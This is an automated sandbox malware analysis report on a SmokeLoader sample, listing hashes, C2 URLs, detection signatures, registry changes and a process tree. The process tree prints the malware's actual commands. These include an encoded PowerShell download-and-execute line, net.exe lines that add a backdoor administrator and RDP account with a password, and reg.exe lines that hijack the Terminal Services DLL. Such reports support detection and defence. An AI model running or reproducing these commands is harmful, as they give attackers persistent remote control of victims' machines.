Analysis
- max time kernel: 154s
- max time network: 131s
- platform: windows10_x64
- resource: win10-en-20211014
- submitted: 28-10-2021 15:55
- Static task: static1
- Behavioral task: behavioral1
  Sample: 9c32bd3ba8c37a5667aae34bbc4a84a9.exe
  Resource: win7-en-20210920
- Behavioral task: behavioral2
  Sample: 9c32bd3ba8c37a5667aae34bbc4a84a9.exe
  Resource: win10-en-20211014
General
- Target: 9c32bd3ba8c37a5667aae34bbc4a84a9.exe
- Size: 340KB
- MD5: 9c32bd3ba8c37a5667aae34bbc4a84a9
- SHA1: 59df4764d50b6859ffcb1bbf660f27d2b6bf8d1c
- SHA256: 14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992
- SHA512: cd72c85cd317db7867bd39c2d9b438751f3d1fbfd472fc3d55191f5f3f1b7727a19dc81e626b54a64acd684adc880012f03d6b9b1573f9bd00c415c6cb04cd85
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
- Extracted: smokeloader
  Version: 2020
  C2 URLs:
  http://brandyjaggers.com/upload/
  http://andbal.com/upload/
  http://alotofquotes.com/upload/
  http://szpnc.cn/upload/
  http://uggeboots.com/upload/
  http://100klv.com/upload/
  http://rapmusic.at/upload/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes (flow / pid / process):
  61  3488  powershell.exe
  64  3488  powershell.exe
  65  3488  powershell.exe
  66  3488  powershell.exe
  68  3488  powershell.exe
  71  3488  powershell.exe
  73  3488  powershell.exe
  75  3488  powershell.exe
  78  3488  powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoC)
  Processes (pid / process):
  844  7645.exe
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
  Resources (resource / yara_rule):
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
- Deletes itself (1 IoC)
  Processes (pid / process):
  2568  (process name not recorded)
- Loads dropped DLL (2 IoCs)
  Processes (pid / process):
  2076  (process name not recorded)
  2076  (process name not recorded)
- Drops file in Program Files directory (4 IoCs)
  Processes (description / ioc / process):
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes (description / ioc / process):
  File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
  File created  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_00fdmmfz.f3g.psm1  powershell.exe
  File created  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3A5.tmp  powershell.exe
  File created  C:\Windows\branding\mediasvc.png  powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
  File created  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_bwfex1yq.5u3.ps1  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF2F7.tmp  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3A4.tmp  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3C5.tmp  powershell.exe
  File created  C:\Windows\branding\mediasrv.png  powershell.exe
  File created  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3C6.tmp  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  powershell.exe
  File created  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
  File created  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes (description / ioc / process):
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  9c32bd3ba8c37a5667aae34bbc4a84a9.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  9c32bd3ba8c37a5667aae34bbc4a84a9.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  9c32bd3ba8c37a5667aae34bbc4a84a9.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes (description / ioc / process):
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."  powershell.exe
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 0a705db740c1d701  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"  powershell.exe
  Set value (int)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description / flow / ioc):
  HTTP User-Agent header  65  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  66  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  68  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  64  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid / process):
  8  9c32bd3ba8c37a5667aae34bbc4a84a9.exe
  8  9c32bd3ba8c37a5667aae34bbc4a84a9.exe
  2568  (process name not recorded; this pid accounts for the remaining 62 IoCs)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes (pid / process):
  2568  (process name not recorded)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid / process):
  644  (process name not recorded)
  644  (process name not recorded)
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes (pid / process):
  8  9c32bd3ba8c37a5667aae34bbc4a84a9.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description / pid / process), grouped by pid:
  pid 688 (powershell.exe): Token: SeDebugPrivilege
  pid 1972 (powershell.exe): Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 2736 (powershell.exe): Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 820 (powershell.exe): Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes (pid / process):
  2568  (process name not recorded)
  2568  (process name not recorded)
- Suspicious use of SendNotifyMessage (2 IoCs)
  Processes (pid / process):
  2568  (process name not recorded)
  2568  (process name not recorded)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description / pid / process / target process); each write below is recorded twice in the report:
  PID 2568 wrote to memory of 844  2568  (process name not recorded) -> 7645.exe
  PID 844 wrote to memory of 688  844  7645.exe -> powershell.exe
  PID 688 wrote to memory of 3488  688  powershell.exe -> csc.exe
  PID 3488 wrote to memory of 2556  3488  csc.exe -> cvtres.exe
  PID 688 wrote to memory of 1972  688  powershell.exe -> powershell.exe
  PID 688 wrote to memory of 2736  688  powershell.exe -> powershell.exe
  PID 688 wrote to memory of 820  688  powershell.exe -> powershell.exe
  PID 688 wrote to memory of 3044  688  powershell.exe -> reg.exe
  PID 688 wrote to memory of 1556  688  powershell.exe -> reg.exe
  PID 688 wrote to memory of 3708  688  powershell.exe -> reg.exe
  PID 688 wrote to memory of 2380  688  powershell.exe -> net.exe
  PID 2380 wrote to memory of 3804  2380  net.exe -> net1.exe
  PID 688 wrote to memory of 2868  688  powershell.exe -> cmd.exe
  PID 2868 wrote to memory of 2240  2868  cmd.exe -> cmd.exe
  PID 2240 wrote to memory of 1664  2240  cmd.exe -> net.exe
  PID 1664 wrote to memory of 1900  1664  net.exe -> net1.exe
  PID 688 wrote to memory of 3288  688  powershell.exe -> cmd.exe
  PID 3288 wrote to memory of 3612  3288  cmd.exe -> cmd.exe
  PID 3612 wrote to memory of 2468  3612  cmd.exe -> net.exe
  PID 2468 wrote to memory of 3864  2468  net.exe -> net1.exe
  PID 3756 wrote to memory of 2084  3756  cmd.exe -> net.exe
  PID 2084 wrote to memory of 1724  2084  net.exe -> net1.exe
  PID 2736 wrote to memory of 2232  2736  cmd.exe -> net.exe
  PID 2232 wrote to memory of 1008  2232  net.exe -> net1.exe
  PID 2840 wrote to memory of 3292  2840  cmd.exe -> net.exe
  PID 3292 wrote to memory of 3236  3292  net.exe -> net1.exe
  PID 1540 wrote to memory of 4008  1540  cmd.exe -> net.exe
  PID 4008 wrote to memory of 2588  4008  net.exe -> net1.exe
  PID 2204 wrote to memory of 2244  2204  cmd.exe -> net.exe
  PID 2244 wrote to memory of 3828  2244  net.exe -> net1.exe
  PID 2760 wrote to memory of 1056  2760  cmd.exe -> net.exe
  PID 1056 wrote to memory of 1680  1056  net.exe -> net1.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\9c32bd3ba8c37a5667aae34bbc4a84a9.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\9c32bd3ba8c37a5667aae34bbc4a84a9.exe"
  Signatures: Checks SCSI registry key(s); Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection
- C:\Users\Admin\AppData\Local\Temp\7645.exe (depth 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\7645.exe
  Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in Windows directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwnnvqyb\nwnnvqyb.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EEE.tmp" "c:\Users\Admin\AppData\Local\Temp\nwnnvqyb\CSCEB3CB7ED157E4EF6836E44E436CC1C4F.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe (depth 3)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (depth 4)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (depth 5)
          Command line: net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (depth 6)
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (depth 5)
          Command line: net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (depth 6)
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc 000000 /del
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc oCFzRLfU /add
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc oCFzRLfU /add
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc oCFzRLfU /add
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc oCFzRLfU
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc oCFzRLfU
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc oCFzRLfU
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic path win32_VideoController get name
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic CPU get NAME
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (depth 2)
